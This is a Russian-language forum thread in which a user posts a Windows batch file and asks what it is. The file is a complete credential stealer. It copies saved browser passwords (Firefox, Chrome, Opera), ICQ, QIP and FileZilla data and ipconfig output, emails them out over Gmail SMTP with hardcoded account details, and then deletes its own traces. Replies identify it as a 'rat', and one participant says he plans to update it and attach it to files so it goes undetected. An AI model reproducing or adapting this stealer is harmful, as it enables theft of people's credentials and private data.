Крысятник?

что это?

@echo off
cls
mkdir c:\cache\load\%1
echo Dim oShell>>c:\cache\load\url.vbs
echo Dim oShortCut>>c:\cache\load\url.vbs
echo set oShell = WScript.CreateObject ("WScript.Shell")>>c:\cache\load\url.vbs

echo var shell = new ActiveXObject("WScript.shell");>>c:\cache\load\ip.js
echo shell.run("cmd.exe /c ipconfig >>c:/cache/load/ip.txt"), 0, false;>>c:\cache\load\ip.js
echo shell.Quit;>>c:\cache\load\ip.js
echo Set s=WScript.CreateObject("WScript.Shell")>>xcopy.vbs
echo s.Run "c:\cache\load\tmp.bat",0,false>>xcopy.vbs
echo Set v=WScript.CreateObject("WScript.Shell")>>xcopy.vbs
echo v.Run "c:\cache\load\smtp.vbs",0,false>>xcopy.vbs
echo WScript.Sleep(2000)>>xcopy.vbs

start c:\cache\load\ip.js
start xcopy.vbs
start c:\cache\load\url.vbs
echo on error resume next>>c:\cache\load\smtp.vbs
echo WScript.Sleep(42000)>>c:\cache\load\smtp.vbs

echo cd/d %appdata%\ICQ\000000\>>c:\cache\load\tmp.bat
echo copy /y Owner.qdb %systemdrive%\cache\Owner.qdb>>c:\cache\load\tmp.bat
echo cd/d %appdata%\mozilla\firefox\profiles\*.default\>>c:\cache\load\tmp.bat
echo copy /y key3.db %systemdrive%\cache\key3.db>>c:\cache\load\tmp.bat
echo copy /y signons.sqlite %systemdrive%\cache\signons.sqlite>>c:\cache\load\tmp.bat
echo cd/d %APPDATA%\Opera\Opera\>>c:\cache\load\tmp.bat
echo copy /y wand.dat %SystemDrive%\cache\wand.dat >>c:\cache\load\tmp.bat
echo Xcopy "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Login Data" /s /y /d /h /c "C:\cache">>c:\cache\load\tmp.bat
echo Xcopy "%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Default\Web Data" /s /y /d /h /c "C:\cache">>c:\cache\load\tmp.bat
echo cd/d %appdata%\FileZilla\>>c:\cache\load\tmp.bat
echo copy /y recentservers.xml %systemdrive%\cache\recentservers.xml>>c:\cache\load\tmp.bat
echo cd/d %appdata%\QIP\Profiles\0000000\>>c:\cache\load\tmp.bat
echo copy /y 0000000.bip %systemdrive%\cache\0000000.bip>>c:\cache\load\tmp.bat

echo Set WshShell = CreateObject("WScript.Shell")>>c:\cache\load\smtp.vbs

echo Const EmailFrom = "[email protected]">>c:\cache\load\smtp.vbs
echo Const EmailPassword = "abvgvk000">>c:\cache\load\smtp.vbs
echo Const strSmtpServer = "Smtp.gmail.com">>c:\cache\load\smtp.vbs
echo Const EmailTo = "[email protected]" >>c:\cache\load\smtp.vbs

echo Set objEmail = CreateObject("CDO.Message")>>c:\cache\load\smtp.vbs
echo Set FSO = CreateObject("sсriрting.FileSystemObject")>>c:\cache\load\smtp.vbs
echo objEmail.From = EmailFrom>>c:\cache\load\smtp.vbs
echo objEmail.To = EmailTo>>c:\cache\load\smtp.vbs
echo objEmail.Subject = "report stolen">>c:\cache\load\smtp.vbs
echo objEmail.Textbody = "the robot brought the passwords">>c:\cache\load\smtp.vbs

echo objEmail.AddAttachment "C:\cache\key3.db">>c:\cache\load\smtp.vbs
echo objEmail.AddAttachment "C:\cache\signons.sqlite">>c:\cache\load\smtp.vbs
echo objEmail.AddAttachment "C:\cache\wand.dat">>c:\cache\load\smtp.vbs
echo objEmail.AddAttachment "C:\cache\Login Data">>c:\cache\load\smtp.vbs
echo objEmail.AddAttachment "C:\cache\Web Data">>c:\cache\load\smtp.vbs
echo objEmail.AddAttachment "C:\cache\Owner.qdb">>c:\cache\load\smtp.vbs
echo objEmail.AddAttachment "c:\cache\load\ip.txt">>c:\cache\load\smtp.vbs
echo objEmail.AddAttachment "c:\cache\recentservers.xml">>c:\cache\load\smtp.vbs
echo objEmail.AddAttachment "c:\cache\0000000.bip">>c:\cache\load\smtp.vbs

echo objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 02>>c:\cache\load\smtp.vbs
echo objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 01>>c:\cache\load\smtp.vbs
echo objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusername") = EmailFrom>>c:\cache\load\smtp.vbs
echo objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = EmailPassword>>c:\cache\load\smtp.vbs
echo objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = strSmtpServer>>c:\cache\load\smtp.vbs
echo objEmail.Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 25>>c:\cache\load\smtp.vbs

echo objEmail.Configuration.Fields.Update>>c:\cache\load\smtp.vbs
echo objEmail.Send>>c:\cache\load\smtp.vbs

echo set FSO=CreateObject("Scripting.FileSystemObject")>>c:\cache\load\del.vbs

echo FSO.Deletefile "xcopy.vbs">>c:\cache\load\del.vbs
echo FSO.Deletefolder "c:\cache">>c:\cache\load\del.vbs
echo FSO.Deletefile "profilepic42069_1.bat">>c:\cache\load\del.vbs
echo FSO.Deletefile "tmp.bat">>c:\cache\load\del.vbs

echo Set a=WScript.CreateObject("WScript.Shell")>>c:\cache\load\smtp.vbs
echo a.Run "c:\cache\load\del.vbs">>c:\cache\load\smtp.vbs
echo WScript.Sleep(48000)>>c:\cache\load\del.vbs

 

Очень старо.. шлет файлы пассов от браузеров на почту. хрень полная.

 

Взять и переделать под новые версии браузеров. Займусь после сессии. Ведь это бат,а бат очень весело цеплять к файлам) И непалевно)

 

echo Const EmailFrom = "[email protected]">>c:\cache\load\smtp.vbs
echo Const EmailPassword = "abvgvk000">>c:\cache\load\smtp.vbs
точна крыса

 

кто объяснить что значит "крыса"?

 

трой, стучалка или бекдор вариаций много))